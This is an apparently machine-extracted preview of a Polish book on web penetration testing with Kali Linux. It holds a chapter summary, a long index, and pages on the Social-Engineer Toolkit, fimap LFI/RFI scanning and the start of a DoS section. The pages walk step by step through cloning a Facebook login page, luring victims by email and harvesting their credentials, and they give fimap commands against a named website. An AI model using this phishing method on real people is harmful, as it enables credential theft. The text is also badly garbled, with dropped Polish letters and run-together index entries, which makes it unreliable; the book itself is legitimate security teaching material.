W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 27: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

